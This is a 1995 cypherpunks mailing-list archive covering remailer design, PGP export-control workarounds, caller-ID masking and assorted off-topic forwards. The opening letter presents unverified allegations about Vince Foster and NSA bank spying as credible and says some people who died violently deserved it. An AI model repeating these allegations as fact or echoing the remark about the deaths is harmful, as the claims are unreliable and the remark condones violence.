> > nuclear secrets by Israel is openly discussed in Israeli newspapers, so 
> > I am sure that this is not one of the "off-the-wall" issues to which 
> > you are referring.  (With respect to that issue, I suggest that you do 
> > some investigation in Tel Aviv.)
> > 
> > With respect to money laundering I am not concerned,  for reasons I have 
> > indicated in my essay "The End of Ordinary of Money",  Parts I and II,  
> > a copy of which I previously provided the Committee.  The money-laundering 
> > laws ought to be abolished, but in the meantime I do find the selective 
> > enforcement of these laws troubling.
> > 
> > With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky,
> > so perhaps you could be more specific which Chuck you refer to.  What stories 
> > did he tell you, and how is it that they didn't pan out?
> > 
> > Since you have already spoken to both Jim and Chuck, I am taking the liberty 
> > of sending a copy of this letter (and your letter) to Jim Norman, and to one 
> > possible Chuck you may be referring to, so that perhaps they can explain to 
> > me their failing to satisfy you as to the accuracy of their information.
> > 
> > Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's 
> > behavior that is troubling me.  I am sure that there is an innocent 
> > explanation that I am missing. You will recall the meeting that I had with 
> > you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons 
> > in Georgetown on Monday, June 12, 1995.  Two days previously I had been 
> > playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some 
> > others, and I had pulled most of the muscles in my right ankle.  So I 
> > asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis 
> > graciously consented.  We met in the Four Seasons lounge, where I was the 
> > only person not wearing shoes.    
> > 
> > You told me that, more than money laundering in Mena, Arkansas, you were 
> > interested as to whether there were any documents connecting Vince Foster 
> > to Systematics, or whether I knew the name of any Systematics programmers 
> > that may have worked to modify the PROMIS software to spy on banking 
> > transactions.  I told you I couldn't recall seeing any such documents, and 
> > that I had come across the name of one programmer, but I had subsequently 
> > forgotten it.  It was a pleasant meeting, so to be helpful I gave you a 
> > copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*.  
> > "Why would Steve Forbes kill the article?" you asked.  I said I didn't 
> > know, but that--since you appeared to know Steve Forbes--you should call 
> > him yourself.
> > 
> > Now, much to my surprise, I find that the following happened:  Just as 
> > *Media Bypass* was about to run Jim Norman's article *Fostergate*, they 
> > received a letter from Charles O. Morgan, indicating grave consequences 
> > if they were so foolish as to print the article. Mr. Morgan claimed to know 
> > what was in the article, because, he said, he had received a copy from Mr. 
> > Stephen Ganis of your Committee!  
> > 
> > I am bothered by the fact that while you alleged to me you were investigating 
> > Systematics that at the same time you are passing along information to 
> > Systematics.  I am sure there is an innocent explanation.  But consider this:  
> > what if I had given you Foster-related documents and the names of Systematics 
> > programmers?  Would these have been passed along to Mr. Morgan also?  As you 
> > know, a number of people connected to this whole business have died violent 
> > deaths in Arkansas.  (Of course, I understand some of them had already been 
> > paid off to keep their mouths shut, and didn't, and so--under any standard of 
> > morality--deserved what they got.)  
> > 
> > Well, things are never what they appear, so perhaps you can clear things up 
> > for me. Please pass along my concern to Mr. Ganis, and tell him I will be 
> > glad to sit down with him and have a drink, or share a line, and have a frank 
> > discussion about this issue. (I have nothing against the use of any drug, if 
> > used in moderation, and in the appropriate context.) 
> >    
> > Regards,
> > Orlin
> > 
> > Attachment:  Your letter to me
> > - ---------------------------------------------------------------------
> > 
> > From:   IN%"gregorw@netcom.com" 23-JUL-1995 19:53:52.82
> > To:     IN%"KALLISTE@delphi.com"
> > CC:     
> > Subj:   RE:  Part VII
> > 
> > Return-path: <gregorw@netcom.com>
> > Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880)
> >  id <01HT7ZLMQQTC9VUSVZ@delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT)
> > Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun,
> >  23 Jul 1995 16:51:04 -0700
> > Date: Sun, 23 Jul 1995 16:51:04 -0700
> > From: gregorw@netcom.com (Gregory Wierzynski)
> > Subject: Re:  Part VII
> > To: KALLISTE@delphi.com
> > Message-id: <199507232351.QAA03469@netcom13.netcom.com>
> > Content-transfer-encoding: 7BIT
> > 
> > Orlin --
> > 
> > We're reading your stuff with interest. Thank you for including me in your 
> > list of recipients; I pass the material on to my boss and my colleagues on 
> > the Committee.
> > 
> > I am somewhat surprised, however, that you accept the Norman piece without 
> > raising any questions about its sources. We've talked to Jim and tried to 
> > check out the sources he thought he could share with us. We have also done 
> > a fair amount of investigating on our own using the resources available to 
> > us--by which I mean officials inquiries to the spooks. So far we draw a 
> > complete blank. Worse, the preponderance of the evidence suggests that 
> > Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in 
> > the face not just of facts, but simple logic as well. 
> > 
> > I haven't, by any means, given up on this subject, but pursuing a trail 
> > grown cold is difficult to justify when you're paid by the taxpayer.
> > 
> > Do you have suggestions on how we could verify some of the elements in the 
> > Norman story? I've talked to Chuck in Kentucky and am still in touch with 
> > him. But his stories have not panned out, even partially. I would be most 
> > interested in your ideas. 
> > 
> > Best regards. 
> > Greg
> > 
> > - -
> > 
> > 
> > 
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > 
> > iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8
> > bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF
> > QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL
> > csNGnDpuTq0=
> > =t4hx
> > -----END PGP SIGNATURE-----
> > 
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 24 Jul 95 16:19:10 PDT
To: cypherpunks@toad.com
Subject: Re: An idea about Java and remailer clients and servers...
Message-ID: <199507242313.BAA27191@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
>  Why not "charge" for the ability to send an anonymous message with
>  the duty to have for a short time (maybe an hour or two) running
>  on your machine a node in a remailer network?

User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
to Machine B.  User Y on Machine C receives an anonymous mail from Machine
B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
himself to User X.  User X's temporary remailer does as it's told.  User Y
now has a strong reason to suspect User X has sent the said mail.

Cpunks write code and all, but I don't think this one's going to work. :-(






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jed@blaze.cs.jhu.edu (Jeremy Rauch)
Date: Mon, 24 Jul 95 19:00:07 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <m0saTpk-0005BTC@nrk.com>
Message-ID: <3v1j6h$fge@blaze.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher (wb8foz@nrk.com) wrote:


: marc:
: > However, goods of U.S. origin are export restricted, unless said
: > goods are further processed outside the U.S. so as to result in a
: > substantial change in value, so some of the PGP development would
: > need to be done in Canada.

: How about compiling it? THAT is "further processing"......

Perhaps...but I for one wouldn't trust anyone else to compile my copy
of PGP...would you?
And, note, it says sustantial change in value...I don't know if this is taken
to mean monetary, or usability...the later might work.  
It's an interesting idea.
Jeremy


: -- 
: A host is a host from coast to coast.................wb8foz@nrk.com
: & no one will talk to a host that's close........[v].(301) 56-LINUX
: Unless the host (that isn't close).........................pob 1433
: is busy, hung or dead....................................20915-1433

--
 ____________________________________________________________________________
| Jeremy Rauch              .--~~,__   |                                     |
|              :-....,-------`~~'._.'  |         jed@cs.jhu.edu              |
|               `-,,,  ,_      ;'~U'   |    alhambra@jhu.edu                 |
| Johns Hopkins  _,-' ,'`-__; '--.     |         jed@jhunix.hcf.jhu.edu      |
|   University  (_/'~~      ''''(;     |     http://server.cs.jhu.edu/~jed   |
|______________________________________|_____________________________________|
Finger for PGP key
				Member, *the Guild

          The light that burns twice as bright burns half as long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 25 Jul 95 02:14:45 PDT
To: cypherpunks@toad.com
Subject: (fwd) INTERNET APPLICATIONS ENGINEER/CommerceNet
Message-ID: <199507250912.CAA02676@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    Found this during my job search.  Lacking the skills myself,
    thought perhaps someone else on the list might be interested.
    --------------------------------------------------------------

Enterprise Integration Technologies (EIT) is a recognized pioneer in the
development of software and services for electronic commerce on the
Internet.  EIT has played significant management roles in Terisa Systems,
a company that develops, markets, licenses, and supports technologies that
make secure Internet transactions possible and CommerceNet Consortium,
which  facilitates the use of an Internet-based infrastructure for
electronic commerce to allow efficient interactions among customers,
suppliers and development partners.  Additionally, EIT was integrally
involved in the development of WebSite, a product of O'Reilly &
Associates, Inc.

The following position is currently available:


INTERNET APPLICATIONS ENGINEER/CommerceNet
REQ #103


As a CommerceNet development team member you will be responsible for
developing Internet-based security-enabled electronic commerce
applications.  

The focus will be integrating secure peer-to-peer messaging technologies,
secure distributed hypermedia environments (e.g., World-Wide Web, S-HTTP,
and SSL), and relational databases to support a variety of electronic
commerce processes.  

Develop applications in support of public key certification authorities.

The first test of an integrated secure email and WWW solutions will be
with CommerceNet members from the electronics industry. Will work with
these members in the Electronics Industry Pilot who wish to reengineer
their Request for Quotation processes using Internet-based technologies.


The ideal candidate will have:

  BSCS or equivalent
  Programming languages (e.g., C, C++), scripting languages (e.g., Perl) 
  HTML, TCP/IP, SMTP and HTTP experience
  Experience with relational databases is desirable
  Experience writing CGI applications for the World-Wide Web
  Experience with public key and symmetric cryptography



If you are interested,  send your resume via e-mail to eit-jobs@eit.com or
you can fax your resume to (415) 617-8019.  Please indicate the
requisition number of the position for which you are applying.

If you want to mail us a resume, please send it to: 

Enterprise Integration Technologies   
800 El Camino Real 
Menlo Park, California 94025
EOE,  Principals only please




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Tue, 25 Jul 95 01:53:30 PDT
To: cypherpunks@toad.com
Subject: The Big Win (doze)..A simple explanation
Message-ID: <199507250853.BAA25871@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that I've gotten Eudora back, I found this
totally simple explanation to it all.
It came from Doc Ozone via a via a via

So.....

>>You make the call...
>>
>>Be seeing you,
>>
>>~ronC
>>
>>------- Forwarded Message
>>(via mmesser@infinity.com).
>>
>>  Given Microsoft's recently announced acquisition of the Roman Catholic
>>Church, I find the following message, received earlier today, extremely
>>distressing.
>>
>> ---------------------------------------------------
>>
>>The real name of "the" Bill Gates is William Henry Gates III.
>>Nowadays he is known as Bill Gates (III), where "III" means the order
>>of third (3rd.)
>>
>>By converting the letters of his current name to the ASCII-values and
>>adding his (III), you get the following:
>>
>>B       66
>>I       73
>>L       76
>>L       76
>>G       71
>>A       65
>>T       84
>>E       69
>>S       83
>>+        3
>> --------------
>>       666 !!
>>
>>Some might ask, "How did Bill Gates get so powerful?" Coincidence? Or
>>just the beginning of mankind's ultimate and total enslavement???
>>
>>YOU decide!
>>
>>Before you decide, consider the following:
>>
>>M  S  -  D  O  S     6  .  2  1
>>77+83+45+68+79+83+32+54+46+50+49 = 666
>>
>>W  I  N  D  O  W  S  9  5
>>87+73+78+68+79+87+83+57+53+1 = 666
>>
>>Coincidence?  I think not
>>
>>------- End of Forwarded Message
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Mon, 24 Jul 95 22:00:26 PDT
To: jed@blaze.cs.jhu.edu (Jeremy Rauch)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <3v1j6h$fge@blaze.cs.jhu.edu>
Message-ID: <m0safl4-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text



> : How about compiling it? THAT is "further processing"......

> Perhaps...but I for one wouldn't trust anyone else to compile my copy
> of PGP...would you?
Not at all. But who says I must USE the compiled version?
I get Linux with both source & object on one CD. Pick & choose as I
please....

> And, note, it says sustantial change in value...I don't know if this is taken
> to mean monetary, or usability...the later might work.  
Or offer many compiled versions, with source tree.
	Comes complete SYSIII, LISA, PET and
	TRS-80 versions!!!!!

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 25 Jul 95 02:46:14 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
In-Reply-To: <Pine.SOL.3.91.950724234854.130D-100000@use.usit.net>
Message-ID: <9507250946.AA01832@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Could we end this series of irrelevancies, please? This is not
ConspiracyPunks, this is cypherpunks. We deploy cryptography, not
random conspiracy theories.

.pm

Brad Dolan writes:
> 
> 
> ---------- Forwarded message ----------
> Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
> From: KALLISTE@delphi.com
> Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>    Allegations Regarding Vince Foster, the NSA, and
> 	 Banking Transaction Spying, Part IX 
> 
> 		  by J. Orlin Grabbe
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 25 Jul 95 06:30:09 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: community standards in cyberspace (fwd)
Message-ID: <Pine.SUN.3.91.950725092525.9614A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nice thought, but... well... I wish the congresscritters thought that way...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

---------- Forwarded message ----------
Date: Mon, 24 Jul 1995 22:49:43 -0700 (PDT)
From: Tildy Bayar <tildy@ella.mills.edu>
To: bdsm-list@blob.best.net
Subject: community standards in cyberspace (fwd)

> [exerpt]
> 
> DEVIANCE -- COMPARED TO WHAT?
> Peter Huber, author of "Orwell's Revenge" and senior fellow at the Manhattan
> Institute, points out that "community standards" are no longer definable in
> cyberspace.  "`Deviance' loses its meaning, when communities of the
> like-minded are formed entirely by consent.  Freedom of association is so
> complete in cyberspace that traditional limits on freedom of speech become
> almost impossible to justify constitutionally."  (Forbes 7/31/95 p.110)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 25 Jul 95 08:17:01 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
Message-ID: <9507251516.AA21669@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> : marc:
> : > However, goods of U.S. origin are export restricted, unless said
> : > goods are further processed outside the U.S. so as to result in a
> : > substantial change in value, so some of the PGP development would
> : > need to be done in Canada.
> 
> : How about compiling it? THAT is "further processing"......
> 
> Perhaps...but I for one wouldn't trust anyone else to compile my copy
> of PGP...would you?

I would use a precompiled version of PGP *if* it came from
and was signed by someone I trusted.
After all - I don't read all the source code - do you?

> And, note, it says sustantial change in value...I don't know if this is taken
> to mean monetary, or usability...the later might work.  
> It's an interesting idea.
> Jeremy
> 
I would say that if you can sell something that people
would otherwise get for free, then you have added value.
So, pre-compile for a couple of architectures, and then
slap them on a CD-ROM with source.  
Definite tangable value from the CD-ROM then.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 25 Jul 95 10:45:21 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: CALLER ID AVOIDANCE
Message-ID: <199507251742.KAA13448@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > If one can afford it, I suggest chaining through 
>> > 1-900-CUT-TRAX  and  1-900-STO-PPER

I thought that at least 1-900-stopper kept logs in case they got
subpoenaed or sued or had billing disputes or whatever?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 25 Jul 95 10:45:22 PDT
To: Ray Arachelian <an253398@anon.penet.fi>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507251742.KAA13464@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>  0. Mobsters still get caught and thrown in jail.
>  1. They don't use crypto at all.  All records are in the open and 
>searchable.  LEA's wet dream.
>  2. They use strong crypto and can't be caught at all.  LEA's nightmare.
>  3. They use crypto, but are still catchable (oops, the secret is out of 
>the bag now, cancel all the computer related RICO nonsense.)
>  4. They don't use crypto, but keep no records, or hide them well.  They 
>can still be caught by LEA's.
>
>  3 & 4 are the most likely, and the LEA's shameful little secret.  They 
>cry wolf to set a wolf trap, but meanwhile they're hunting wabbits, not 
>wolves.  

Nah, they're hunting sheep, and they've been pretty successful so far.  
Right after the OKC bombing, Freeh was saying that he needed to ban
encryption and get more funds for Digital Telephony to stop terrorists.

2 isn't credible, except for purely-data crimes like money-laundering,
tax evasion, and conspiracy.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 25 Jul 95 09:11:10 PDT
To: craig@passport.ca (Craig Hubley)
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <m0sZZTz-001Bg4C@passport.ca>
Message-ID: <9507251610.AA16331@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <m0sZZTz-001Bg4C@passport.ca> Craig Hubley writes:
>Any time the Supreme Court strikes down a law, any politician who has been 
>found to have voted in favor of three such laws is immediately stripped of
>all offices and rendered ineligible to run for public office ever again,
>at any level.

This might be nice, but questions of "upsetting the system of checks
and balances" aside, you can't do it.  It would violate Article I,
Section 6 of the Constitution, which says that "for any speech or
debate in either House, [the Senators and Representatives] shall not be
questioned in any other place".  "Speech or debate" would cover the
vote on any question.

Therefore, the only organization which can hold a
senator/representative liable for passing a bad law is the one which
passed the law. :(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jhames@deltanet.com (Joel Hames)
Date: Tue, 25 Jul 95 11:38:11 PDT
To: cypherpunks@toad.com
Subject: Questions about Conferences
Message-ID: <9507251837.AA29943@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


As a relatively new person to cryptography, I am trying to read and
research, as well
as follow this list, everything I can about the subject.  Because of this
interest, I have
a few questions for the list.

1)    What is Defcon?  I am not that far from Las Vegas and am interested in the
conference and how I might attend.

2)  Similarly, how would I get information on Crypto '95?  I have read the
papers
from previous years and I would be interested in running up to Santa Barbara to
check it out.

And on a different note,

3)  Has anyone heard much about the security of First Security National
Bank? (www.fsnb.com)
I checked out what they have available already and it seems well put
together.  I realize
they haven't released the "white" paper with specific security
(cryptographic) specs on it yet,
but has anyone heard anything yet?  If it is as secure as it claims, I might
consider opening an 
account with them.

Thanks,

Joel Hames
jhames@deltanet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 25 Jul 95 11:41:14 PDT
To: cypherpunks@toad.com
Subject: Remailer economics, Java & remailers
Message-ID: <v02120d05ac3aed03cbdc@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



In a previous post I mentioned that in a remailer economy, remailer
users should have the opportunity to earn pre-paid service tokens by
acting as part of a remailer network. I also mentioned that this had
the benefit of providing cover traffic for the remailer user's own
activities.

Some people pointed out that their ISP agreements forbid them to
run remailers (!), and that not everyone is willing to tackle the
(as yet undetermined) legal liability or risk of general legal
hassle (which we've seen so far) of running a remailer.

First of all, the user client should present the user who wishes to
earn service tokens with the choice of registering as a terminal
or non-terminal remailer link. People get paid more to be terminal
links, since that's the person who is most likely to get hassled.

Second of all, most of the attacks on remailers, as well as any
ISP technique for detecting them, are based on some remailer's use
of SMTP which is a logged service operating on a known port. This
would be avoided by coevolving Mixmaster with "remailing bandwidth
and reputation" servers (spiritual descendents of Raphe's remailer
pinging service).

Something which is taking a small step in this direction is the
WWW front end to remailers available at c2.org as:
http://www.c2.org:80/remail/by-www.html. Note that it has
lots of security problems, but it has interesting conceptual
aspects (it is also extremely easy to use.)

Note that if one were using Java, one could fetch the application
via Netscape, and run it within an HTML document in a Netscape
window, but the sending of the mail could be done using any
appropriate network port or protocol without routing back through
the server where the document came from -- the applet would just
open socket(s) as appropriate and go for it. (Depending on the
user's security settings, a variety of "is it ok for this applet
to do such-and-so" messages may be displayed.)

My gut feeling is that serious remailer users and operators will
ultimately want a standalone application (which can still be
written in Java, and share code with the applet version), but that's
a religious war we don't need to get into again.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 25 Jul 95 09:59:56 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <199507250455.AAA13908@bb.hks.net>
Message-ID: <9507251659.AA16288@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199507250455.AAA13908@bb.hks.net> Lucky Green writes:
>
>In article <m0saTpk-0005BTC@nrk.com>, wb8foz@nrk.com (David Lesher) wrote:
>
>>marc:
>>> However, goods of U.S. origin are export restricted, unless said
>>> goods are further processed outside the U.S. so as to result in a
>>> substantial change in value, so some of the PGP development would
>>> need to be done in Canada.
>>
>>How about compiling it? THAT is "further processing"......
>
>I am not sure that would hold. After all, the disk with the source code to
>"Applied Cryptography" was denied an export license, because the source
>code could be compiled into libraries.

So?  The ITAR doesn't control export to Canada.  Export the source code
to Canada, compile, validate, sign, and put on CD in Canada, and export
to the world.

I also seem to remember a while back (Mar/Apr) someone reported here that the
Canadian bureaucrat responsible for executing import/export rules said
that he didn't consider crypto to be restricted by Canada's rules.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 25 Jul 95 14:43:53 PDT
To: cypherpunks@toad.com
Subject: PGP message and keyring format
Message-ID: <199507252142.OAA10281@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of any documentation describing the format of PGP
messages and keyrings, so that other applications can send and receive 
PGP-compatible messages and work with PGP keyrings?

Thanks for any info..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 25 Jul 95 11:48:29 PDT
To: jhames@deltanet.com (Joel Hames)
Subject: Re: Questions about Conferences
In-Reply-To: <9507251837.AA29943@deltanet.com>
Message-ID: <9507251848.AA20053@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Joel Hames writes:
> 1)    What is Defcon?

Some hacker convention. It doesn't have anything to do with crypto per se.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 25 Jul 95 13:28:05 PDT
To: cypherpunks@toad.com
Subject: Defcon agenda
Message-ID: <Pine.SV4.3.91.950725152522.1476A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can some kind soul forward me a copy of the agenda for Defcon? I need 
dates and times for the various speakers.

Thanks,
Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBVTh+5wXwthmZO1AQGMvgQAhB5RANbZTSPBX+mvdhMiUCnmY2tlYWC3
kTeZc9WNv0qAQSUaYZE0www8pu+X2pZhRaQOKFgbB5cnHvwxoWdgCMj6O8rmDT9X
ft/cgB1cls/EOHOysZdPzzx3en+aVM9EedXpLrsx53uTzaG5SHTWVOfY4nexO65e
HCTFO93Ct1I=
=nNPb
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 25 Jul 95 12:42:28 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <199507251941.PAA28975@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:52 PM 7/22/95 -0400, Rich Salz wrote:
>Better yet do it the way Comedy Central wanted to:
>	Three strikes your out and term limits.  You can run for re-election
>	but if you lose you get shot.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 25 Jul 95 13:11:14 PDT
To: cypherpunks@toad.com
Subject: R. v. Pecciarich decision is online (fwd)
Message-ID: <m0saqJ9-001BjvC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From insight.mcmaster.ca!efc-talk-owner Tue Jul 25 13:23:44 1995
Date: Tue, 25 Jul 95 13:09:49 EDT
From: djones@insight.mcmaster.ca (David Jones)
Message-Id: <9507251709.AA09853@insight.mcmaster.ca>
To: efc-talk@insight.mcmaster.ca
Subject: R. v. Pecciarich decision is online
Sender: efc-talk-owner@insight.mcmaster.ca
Precedence: bulk
Reply-To: djones@insight.mcmaster.ca (David Jones)
X-Efc-Web-Site: http://insight.mcmaster.ca/org/efc
X-Efc-Archive: gopher://insight.mcmaster.ca/11/org/efc
Content-Type: text
Content-Length: 373

The judge's decision in the recent "Pecciarich case" is now available
online.  Apparently, this is Canada's first conviction for distributing
child pornography by computer.

	R. v. Pecciarich [1995] 22 O.R. (3d) p.748-766

HTML	http://insight.mcmaster.ca/org/efc/pages/law/court/R.v.Pecciarich.html
TEXT	gopher://insight.mcmaster.ca/00/org/efc/law/R.v.Pecciarich.06apr95




-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 25 Jul 95 13:29:05 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <199507252027.QAA08468@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:52 PM 7/22/95 -0400, Rich Salz wrote:
>Better yet do it the way Comedy Central wanted to:
>	Three strikes your out and term limits.  You can run for re-election
>	but if you lose you get shot.
>

Or even better -- Gilbert and Sullivan's solution in "Utopia, Ltd."  Despotism Tempered by Dynamite.  Utopia, Ltd -- the South Sea Paradise that organized itself as a joint stock company -- was originally governed by an absolute despot whose despotism was kept in check by the existence of a Public Exploder.  The Public Exploder's job was to blow the King up if he began to oppress the people.  The exercise of his office was kept in check because if he blew up the King, he had to replace him.

http://diamond.idbsu.edu/GaS/utopia/

DCF

"Calynx:  Yes.  After many unhappy experiments in the direction of an ideal Republic, it was found that what may be described as a Despotism tempered by Dynamite provides, on the whole, the most satisfactory description of ruler--an autocrat who dares not abuse his autocratic power."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
